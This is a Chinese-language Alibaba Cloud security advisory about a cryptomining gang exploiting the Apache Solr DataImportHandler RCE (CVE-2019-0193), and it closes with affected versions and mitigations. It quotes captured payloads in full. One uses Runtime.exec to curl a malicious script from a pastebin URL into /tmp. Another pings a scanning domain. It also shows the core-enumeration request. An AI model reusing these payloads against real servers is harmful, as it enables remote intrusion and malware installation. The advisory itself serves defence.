概述
近日,阿裡雲安全團隊監測到挖礦團夥利用solr dataimport RCE(CVE-2019-0193)作為新的攻擊方式對雲上主機進行攻擊,攻擊成功後下載下傳門羅币挖礦程式進行牟利。該團夥使用的惡意腳本與之前報道的“威脅預警 | watchbog挖礦蠕蟲更新,利用Bluekeep RDP等多個漏洞蓄勢待發”文章所提團夥使用的基本一緻,是以基本認為是同一團夥所為。
除此之外,可以合理推測,該團夥一直活躍在尋找新的攻擊方式來植入其惡意程式,阿裡雲安全團隊已在第一時間對該利用方式進行了監控,并對該團夥的行為持續關注。建議使用者及時排查自身主機是否受到影響,并關注阿裡雲安全團隊的相關文章。
漏洞詳情
漏洞簡介
Apache Solr是開源企業搜尋平台,主要包括全文搜尋、動态聚類、富文本處理等功能。Remote Code Execution via DataImportHandler(CVE-2019-0193)是apache Solr在2019.8.1日披露的漏洞預警,此漏洞發生在Solr的DataImportHandler(DIH)子產品中,該子產品提供從資料庫或其他資料源擷取資料的能力。由于Solr admin預設是不需要鑒權認證的,且DIH支援腳本操作,是以可以通過構造惡意http請求,實作遠端指令執行。
如下圖,在solr admin中選擇dataimport頁籤,由于dataimport配置支援腳本,我們可以在配置檔案中寫入惡意腳本,執行curl xxx.xxx.xxx.xx指令。
如下圖,我們服務端收到了solr發送的http請求,證明RCE成功。
利用分析
阿裡雲安全團隊近日監測到有攻擊者嘗試利用此漏洞對阿裡雲上主機進行入侵。其首先發送
http://xx.xx.xx.xx:8983/solr/admin/cores?action=STATUS&wt=json的請求來擷取solr中core的名稱。
之後對這些core_name進行周遊,嘗試向corename/dataimport發送如下payload進而向
https://pastebin.com/raw/jjFzjCwx請求惡意腳本。
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=<dataConfig>
+<dataSource+type="URLDataSource"/>
+<script><![CDATA[
+++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("curl+-fsSL+https://pastebin.com/raw/jjFzjCwx+-o+/tmp/baby");
+++++++++}
+]]></script>
+<document>
+++<entity+name="stackoverflow"
+++++++++++url="https://stackoverflow.com/feeds/tag/solr"
+++++++++++processor="XPathEntityProcessor"
+++++++++++forEach="/feed"
+++++++++++transformer="script:poc"+/>
+</document>
</dataConfig>&name=dataimport 跟進
此位址的惡意腳本,發現其與之前的分析的watchdog挖礦程式隻有一處不同,且為非關鍵内容,之後的部分可以參見之前的文章。
除此之外,還有疑似發送ping指令來收集存在漏洞主機的惡意請求:
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=<dataConfig>
<dataSource type="URLDataSource"/>
<script>
<![CDATA[
function poc(row) {
var Runtime = Java.type("java.lang.Runtime");
Runtime.getRuntime().exec("ping -c 1 solr_CVE_2019_0193XfSIcGVY.awvsscan119.autoverify.cn");
return row;
}
]]></script>
</dataConfig> 漏洞影響
目前,全網使用solr元件的裝置數大約在1.9w台左右,阿裡雲安全團隊建議使用者及時檢視自身機器狀态,防止事态進一步擴大。
IOC
影響版本
- solr 8.2.0 之前版本(不包含)
- 需啟用DataImportHandler子產品
- solr 未啟用鑒權認證或采用弱密碼
安全建議
- 将solr 更新至8.2.0或更新版本(8.2.0版本之後預設不開啟dataconfig參數支援)
- 設定solrconfig.xml->requestHandler->config标簽内内容為空
- 與DIH相關的請求采用白名單過濾
參考文章
[1] 威脅預警 | watchbog挖礦蠕蟲更新,利用Bluekeep RDP等多個漏洞蓄勢待發
[2] CVE-2019-0193 Remote Code Execution via DataImportHandler
本文作者蒼珀